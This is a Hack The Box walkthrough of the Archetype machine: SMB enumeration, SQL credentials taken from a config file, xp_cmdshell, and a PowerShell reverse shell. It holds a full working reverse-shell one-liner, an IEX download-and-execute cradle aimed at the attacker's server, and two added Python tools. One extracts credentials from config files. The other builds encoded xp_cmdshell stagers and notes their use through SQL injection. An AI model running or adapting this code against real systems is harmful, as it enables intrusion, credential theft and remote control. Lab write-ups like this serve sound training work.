
HACK THE BOX | Archetype

Today we are going to dive into hacking. Hack The Box is a popular service where aspiring hackers and penetration testers practice their skills and solve challenges. Basically it is a treasure hunt: you hack the machines, find two flags (user and system) and submit them to complete the task.

Today we are solving the Archetype box, which is a Starting Point box (at least for me). So let's exploit it.

Basic Information

IP address : 10.10.10.27

Released : 188 days ago (at the time of writing)

User owns : 27875

System owns : 28366

Machine rating : 4.0

Created by : egre55

https://app.hackthebox.eu/users/1190

https://twitter.com/egre55/

The steps will be:

  1. Information gathering
  2. Getting into the pilot seat (getting regular user access)
  3. Getting privileged user access

1. Information Gathering

As they say, the more you know about the target, the better you know how to exploit it.

First we gather information with Nmap. Nmap (Network Mapper) is a reconnaissance tool used to discover open ports and the services behind them, and it is widely used in security auditing. Here -p- scans all 65535 TCP ports (a bare -p with no port list is an error; Nmap would try to read -T4 as the port specification), -sV probes service versions and -T4 speeds up the timing:

  • sudo nmap -p- -T4 -sV 10.10.10.27

The scan shows that ports 139, 445 and 1433 are open. I googled them to find out more about them.

Port 139 is the NetBIOS session service, port 445 is SMB, and port 1433 is Microsoft SQL Server. So this machine shares files with other machines on the network, which is great news for us, and it also runs SQL Server, meaning there is a database we may be able to connect to (hopefully it accepts my proposal).

2. Getting regular user access

Let's first focus on SMB. Kali Linux ships with a tool called smbmap, which lists the exposed shares and the permissions we have on them. Passing an empty username and password tests whether a null (anonymous) session is allowed:

  • smbmap -H 10.10.10.27 -u "" -p ""

The command shows two shares that are readable with a null session:

  • IPC$: this hidden share is a special share used for inter-process communication. It does not give access to files or directories like other shares, but lets one talk to processes running on the remote system.
  • backups: a normal share with read access. It has no comment, which means it could contain interesting data if we are able to connect to it.

Now we connect to "backups" using smbclient (-N skips the password prompt, since we are using a null session):

  • smbclient -N //10.10.10.27/backups

Inside there is a file called prod.dtsConfig. This is an SSIS (SQL Server Integration Services) package configuration file, an XML file that can hold a connection string, and this one contains credentials for the SQL Server on port 1433. To connect we use mssqlclient.py from Impacket, filling in the account and password found in the file: mssqlclient.py <user>:<password>@10.10.10.27 (if the account is a Windows login of the form DOMAIN\user rather than a SQL login, write it as DOMAIN/user and add -windows-auth).
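Pulling the credentials out of a .dtsConfig by hand is easy enough, but it is worth seeing where they live. The script below is an added example (not code from the original post): it parses a constructed sample laid out like an SSIS configuration file, whose server, account and password are placeholders rather than the box's real values, picks out every ConnectionString property that carries a user and password, and formats the result as an Impacket target.

```python
import xml.etree.ElementTree as ET

# Constructed sample laid out like an SSIS .dtsConfig file. The server, account
# and password below are placeholders for this example, not values from the box.
SAMPLE_DTSCONFIG = r"""<?xml version="1.0"?>
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="EXAMPLE\builduser" GeneratedFromPackageName="Deploy" GeneratedDate="1/1/2019 10:01:34 AM"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=ExamplePass123;User ID=EXAMPLE\svc_sql;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\Package.Variables[User::BatchSize].Properties[Value]" ValueType="Int32">
    <ConfiguredValue>500</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""


def parse_connection_string(cs: str) -> dict:
    """Split an OLE DB style 'Key=Value;Key=Value;' string into a dict.
    Keys are lower-cased so lookups are case-insensitive."""
    props = {}
    for part in cs.split(";"):
        if "=" not in part:
            continue  # trailing ';' or stray text
        key, value = part.split("=", 1)
        props[key.strip().lower()] = value.strip()
    return props


def extract_credentials(xml_text: str) -> list:
    """Return every ConnectionString property in a .dtsConfig that carries a
    user and password, together with the server and database it points at."""
    root = ET.fromstring(xml_text)
    found = []
    for conf in root.iter("Configuration"):
        path = conf.get("Path", "")
        if "ConnectionString" not in path:
            continue  # package variables, ints, etc. are not what we are after
        props = parse_connection_string(conf.findtext("ConfiguredValue") or "")
        user = props.get("user id") or props.get("uid")
        password = props.get("password") or props.get("pwd")
        if not (user and password):
            continue  # integrated security, or no secret stored in the file
        found.append({
            "path": path,
            "server": props.get("data source") or props.get("server"),
            "database": props.get("initial catalog") or props.get("database"),
            "user": user,
            "password": password,
        })
    return found


def impacket_target(cred: dict, host: str) -> str:
    """Format a credential as Impacket's [domain/]user[:password]@host target.
    A DOMAIN\\user account is a Windows login, so mssqlclient.py also needs -windows-auth."""
    user = cred["user"].replace("\\", "/")  # DOMAIN\user -> DOMAIN/user
    return f"{user}:{cred['password']}@{host}"


if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_DTSCONFIG):
        print(cred["path"])
        print(f"  server={cred['server']} db={cred['database']} user={cred['user']}")
        print(f"  mssqlclient.py {impacket_target(cred, '10.10.10.27')} -windows-auth")
```

The parser deliberately ignores anything that is not a ConnectionString property, so a large configuration file with dozens of package variables yields only the entries worth trying against port 1433.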

After connecting to the SQL Server we use the IS_SRVROLEMEMBER function (SELECT IS_SRVROLEMEMBER('sysadmin');) to find out whether this login is in the sysadmin role, i.e. whether it is the pilot (root) of the database server. A result of 1 means it is.

This user does have sysadmin privileges, so we can use xp_cmdshell to gain command execution on the host. xp_cmdshell is disabled by default and is an advanced option, so "show advanced options" has to be switched on first, and each change needs a RECONFIGURE to take effect:

SQL> EXEC sp_configure 'Show Advanced Options', 1;

[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL> reconfigure;

SQL> sp_configure;

SQL> EXEC sp_configure 'xp_cmdshell', 1;

[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL> reconfigure;

SQL> xp_cmdshell "whoami"

whoami tells us which account xp_cmdshell runs as, and therefore whether we already have administrator privileges. Not in our favour: it does not.

To get into the pilot seat properly (an interactive shell instead of one command at a time through xp_cmdshell) we will use a PowerShell reverse shell. Save the following one-liner as shell.ps1, replacing 10.10.14.3 with your own VPN address:

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

To host the file we start a web server in the directory that contains shell.ps1:

  • python3 -m http.server 80

To catch the connection we listen with netcat on port 443. The firewall is opened for the target's address first, and rlwrap gives the shell line editing and history:

  • sudo ufw allow from 10.10.10.27
  • sudo rlwrap nc -nlvp 443

Now we submit a command through xp_cmdshell that downloads and executes the script. The \" escapes are needed because the URL is quoted inside the PowerShell command, which is itself quoted inside the xp_cmdshell argument:

  • xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"
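The nested quoting in that line (T-SQL around cmd.exe around PowerShell) is where this step most often breaks. The script below is an added example, not code from the original post: it builds the same stager two ways, once with the quoting layers handled explicitly and once with powershell -EncodedCommand, which base64-encodes the UTF-16LE script so no quote reaches cmd.exe at all. The -NoProfile and -NonInteractive switches and the master..xp_cmdshell wrapper are my additions; the listener address 10.10.14.3 is the one used above.

```python
import base64


def tsql_literal(text: str) -> str:
    """Wrap text as a T-SQL single-quoted string literal. The only escaping
    T-SQL needs is doubling any embedded single quote."""
    return "'" + text.replace("'", "''") + "'"


def powershell_encoded(script: str) -> str:
    """powershell.exe -EncodedCommand takes the script as base64 of its
    UTF-16LE bytes, so no quote of any kind has to survive cmd.exe."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of powershell_encoded; also handy for reading a captured -enc blob."""
    return base64.b64decode(b64).decode("utf-16-le")


def download_cradle(lhost: str, path: str = "shell.ps1") -> str:
    """The same IEX/DownloadString cradle used above, as a PowerShell expression.
    Single quotes are a plain string delimiter in PowerShell."""
    return f"IEX (New-Object Net.WebClient).DownloadString('http://{lhost}/{path}')"


def xp_cmdshell_statement(command: str) -> str:
    """Full T-SQL statement for a raw SQL prompt. mssqlclient.py's own
    'xp_cmdshell <cmd>' shortcut adds this wrapper itself, so with the
    shortcut you pass only the inner command."""
    return f"EXEC master..xp_cmdshell {tsql_literal(command)};"


def build_stager(lhost: str, path: str = "shell.ps1") -> str:
    """Stager that fetches and runs shell.ps1 via -EncodedCommand, so the
    T-SQL literal contains no quotes at all."""
    encoded = powershell_encoded(download_cradle(lhost, path))
    cmd = f"powershell -NoProfile -NonInteractive -EncodedCommand {encoded}"
    return xp_cmdshell_statement(cmd)


def build_stager_quoted(lhost: str, path: str = "shell.ps1") -> str:
    """Quoted variant: the URL is single-quoted for PowerShell, the PowerShell
    command is double-quoted for cmd.exe, and the whole thing is single-quoted
    (with embedded quotes doubled) for T-SQL."""
    ps = download_cradle(lhost, path)
    cmd = f'powershell -NoProfile -Command "{ps}"'
    return xp_cmdshell_statement(cmd)


if __name__ == "__main__":
    print(build_stager("10.10.14.3"))
    print(build_stager_quoted("10.10.14.3"))
```

The encoded form is the one to reach for when the command has to pass through yet another layer (a batch file, a scheduled task, an SQL injection rather than a direct SQL prompt), and decode_encoded_command is the same operation an analyst performs on a -enc blob found in process-creation logs.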

The reverse shell lands in the netcat listener, and the user flag is waiting in the user's Desktop folder.
